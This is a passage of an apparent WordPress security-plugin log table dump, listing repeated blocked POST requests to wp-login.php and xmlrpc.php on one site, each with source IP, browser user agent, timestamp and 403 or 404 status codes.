Safari\\/537.36\"}','12ro7HDPEReBUx6Kvlj08LYV',0,1664810027.4688,1217,'','POST',403,0,600,0,1,'',0),('85.91.237.106',1432087914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','w48HqzQbgD1aVPNRnYtZ7iMK',0,1664811189.6882,18832,'','POST',403,0,600,0,1,'',0),('159.203.143.36',2680917796,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','qfcKUQ9oz12aiRZCgv7bhjr6',0,1664811233.5057,1232,'','POST',403,0,600,0,1,'',0),('138.68.140.0',2319748096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','uEZqsFrIKSPGgdW9nR2pMyYL',0,1664812397.7494,15029,'','POST',403,0,600,0,1,'',0),('138.68.84.97',2319733857,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','3EdIqkanGVrwMxhQyWo1iB5A',0,1664812431.2830,1241,'','POST',403,0,600,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','gCSpchXeyF296uP7v3bWBTND',0,1664813607.8353,17776,'','POST',403,0,600,0,1,'',0),('178.217.190.82',3000614482,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','1rZRpPknBxKMg72HyDwY4mFS',0,1664813643.4261,1416,'','POST',403,0,600,0,1,'',0),('46.17.172.162',772910242,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','b54c1qGgIrBxXwQMT9eLYHPJ',0,1664814201.1772,2624,'','POST',403,0,515,0,1,'',0),('194.27.156.245',3256589557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','l5skeZFduSz8fVmPEiqryLIa',0,1664814202.4290,1702,'','POST',403,0,515,0,1,'',0),('23.224.36.205',400565453,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','9vuhZEtbjNof7IdmVzcenr2H',0,1664814206.4060,476,'','POST',403,0,515,0,1,'',0),('185.107.113.246',3110826486,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','9g3NfjObJtGIxnsUeQ8rzAPF',0,1664814207.2980,484,'','POST',403,0,515,0,1,'',0),('115.165.166.192',1940235968,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','3zYWpIAuU0chGHtfTNXxZ9yr',0,1664814211.8624,484,'','POST',403,0,515,0,1,'',0),('51.38.132.211',858162387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','A2jBHlaNg57DLeQ3dOxIZwF1',0,1664814213.8867,531,'','POST',403,0,515,0,1,'',0),('104.251.216.88',1761335384,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','rjtXMdCEnJTvksYH4ReBP9QD',0,1664814215.8212,490,'','POST',403,0,515,0,1,'',0),('46.28.3.42',773587754,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','jxbl40sKYRNTcdm5H7MXFian',0,1664814219.7383,552,'','POST',403,0,515,0,1,'',0),('185.107.113.222',3110826462,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','muw0Yh8LloVDTRWqzjdgIx9S',0,1664814221.2938,493,'','POST',403,0,515,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','d97m1Gjukh0MvNWXSI6K8y4L',0,1664814805.6109,17835,'','POST',403,0,600,0,1,'',0),('72.167.34.14',1218912782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','Yd6GXi0ylEtp9Pz5Q7mWnAIo',0,1664814840.0348,1687,'','POST',403,0,600,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','macMDqySd5BbjfiKFOhrgXlE',0,1664815971.0350,17947,'','POST',403,0,600,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','lyfktSKVs92h7mr4pIquBXbT',0,1664816006.0457,538,'','POST',403,0,600,0,1,'',0),('192.71.144.12',3225915404,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','f47bSCV1cQokjJKXwpv9rT36',0,1664817124.7183,19935,'','POST',403,0,600,0,1,'',0),('148.72.214.245',2487801589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','AVU6RbT81YEPLhF9s7pqlBkm',0,1664817159.0839,3241,'','POST',403,0,600,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','aVAe4HpTz6EFxucvk3M89bSy',0,1664817278.9326,551,'','POST',403,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','oVCm8fxHNbRtP0gM5YvE93Li',0,1664818126.0372,1214,'','POST',403,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','uAGL9WiKmBT45ygC6vrNFDIJ',0,1664818128.0182,468,'','POST',403,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','LD2NISKxQbsgmtworOVaniJR',0,1664818129.2512,487,'','POST',403,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','eSVr6F0dMs2JqDHBwKQ3AUgj',0,1664818130.5314,445,'','POST',403,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','LS6CTBrfgp5uaEenvFk83bWj',0,1664818131.7814,453,'','POST',403,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','DlkzBCmOLSe6WPUncby415Y9',0,1664818133.0138,439,'','POST',404,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','ZkcPbOjIdglL2v8FDt7GCaoe',0,1664818134.3362,441,'','POST',404,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','f74Za9zQPBKqsHdVY1LDbhvN',0,1664818135.6976,430,'','POST',404,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','WV3o7lC9feKSrn4NqmuL8c62',0,1664818137.0154,514,'','POST',404,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','K1qJtIQVxYuaTyEOkgAijpSo',0,1664818138.4147,399,'','POST',404,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','pgHkzu24Y5sUShPIRLEtj9Kr',0,1664818139.7249,424,'','POST',404,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','zZG1E3gJP4oaAFhjykHdDvxu',0,1664818141.0462,770,'','POST',404,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','ONg8XWmS6Pjb91KJFsoruGcn',0,1664818142.7857,433,'','POST',404,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','rpGSxDF0R3dzw258ejMyKq1O',0,1664818144.1404,387,'','POST',404,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','HPT1Np5yx3sE8YbGAOaBo64K',0,1664818145.4900,444,'','POST',404,0,600,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','hUv8o4xzFujlAMBQaVS0giGD',0,1664818146.8443,325,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','IzlkxVPKQX7qnJ4GOMjdCFSg',0,1664818147.8589,316,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','mS9BQ6DAjUGNhbef0IwTCcxZ',0,1664818148.8675,300,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','uTAX5LxK1UEqmpH6PRlz9OCZ',0,1664818149.9089,398,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','JX4DNQgHL3Itnc75RlrVEzTy',0,1664818150.9998,286,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','9SQrmoiUFn1W4ITHyDlhA85K',0,1664818151.9671,300,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','SN5C8ry7MVUAew63E2bqG9Po',0,1664818153.0384,278,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','WSsKn6yVEUrMdQieoFpaRhg5',0,1664818154.0025,343,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','LHY7kf4ed8bZQy6rRGzOKF1h',0,1664818155.0193,290,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','xEG5slpf9j0qrg6FV8SQvoDd',0,1664818156.0076,297,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','V4CryA0LROkDgi1S5uGpaQKj',0,1664818157.0762,330,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','KQA8dxe9aljWw2uzfsq3MC06',0,1664818158.0754,278,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','yhlBJKCxHP7V4FjkSW8r2c1w',0,1664818159.0470,323,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','8DBtGWfwsCx5mrLe7a1oHJXS',0,1664818160.0758,316,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','MI8YEgie3T7pOrcZ4uXDzNoq',0,1664818161.1295,304,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','wgDSBsZTmNzY9Q5RrnXPkc2v',0,1664818162.0857,285,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','Mf3tUmh7GKSVcj2DTbF9EPOC',0,1664818163.0586,370,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','qvQEX6HgfeLsCipkWPFSuBTK',0,1664818164.1151,304,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','mkwlfxA7g0PMXtC1KQYrHn3c',0,1664818165.1983,325,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','FCsJz45vLBRjHPucNIEp7lZT',0,1664818167.2592,337,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','I3vwXs6KnT1YMeJV8jtDioCx',0,1664818168.3033,291,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','FatyCkQ79WKAcbeXsN63J4lu',0,1664818169.2625,311,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','78rEUJVHCuPGo3dFqtMaApbv',0,1664818170.2665,281,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','bzfNBplAEFVRH82Qdmk1oIWn',0,1664818171.2149,324,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','AjpmQSWw6Fy3zsKoO5XD4vnH',0,1664818172.2185,319,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','uiTWPOBmJhCDnbF581v6Gcsq',0,1664818173.2379,326,'','POST',403,0,700,0,1,'',0),('142.93.132.237',2388493549,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1664.3 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','P8UA13vHXqGTKxVrN5oFebL7',0,1664818174.2483,2055,'','POST',403,0,700,0,1,'',0),('148.72.214.194',2487801538,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','Cua5y9RT6gOMxvwLVstlDzWe',0,1664818274.8218,17996,'','POST',403,0,600,0,1,'',0),('157.230.127.126',2649128830,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','CgMwXYTjtFISr0s79HJ6hD2i',0,1664818308.6169,1328,'','POST',403,0,600,0,1,'',0),('92.205.161.6',1556979974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','lBCsxG052m1hZFpMyUfHwuno',0,1664818613.6101,12996,'','POST',403,0,515,0,1,'',0),('148.153.64.181',2493071541,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','sP03JFQ8D6TBelcCuMN4OYdI',0,1664818608.8883,17908,'','POST',403,0,515,0,1,'',0),('51.38.132.211',858162387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','D9Xnt5FMZPfO73QbaVNrpoBL',0,1664818621.4251,5673,'','POST',403,0,515,0,1,'',0),('185.2.6.13',3103917581,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','xJErFylAR4W5hjXIvd98agOi',0,1664818628.4610,514,'','POST',403,0,515,0,1,'',0),('74.208.59.232',1255160808,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','8qu5E1WJSVUhmGTvLXrRDYdb',0,1664818630.6246,484,'','POST',403,0,515,0,1,'',0),('5.161.119.55',94467895,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','ETO7ah8XgAuqJRMpjibzfd53',0,1664818637.5854,536,'','POST',403,0,515,0,1,'',0),('47.106.207.43',795529003,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','KcYLujiWHN7hJdr8XaGS1TvA',0,1664818642.7278,517,'','POST',403,0,515,0,1,'',0),('91.134.248.249',1535572217,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','MeUzc4V1KvpiBGD2XxldT7P9',0,1664818644.7758,558,'','POST',403,0,515,0,1,'',0),('47.114.72.18',796018706,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','fp0KayA4iHE6W2ubcLOoDMjv',0,1664819410.2635,1289,'','POST',403,0,600,0,1,'',0),('185.2.4.33',3103917089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','YmZfVIjMLDiTGvpSFyl8z93t',0,1664819441.5170,480,'','POST',403,0,600,0,1,'',0),('159.203.120.246',2680912118,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 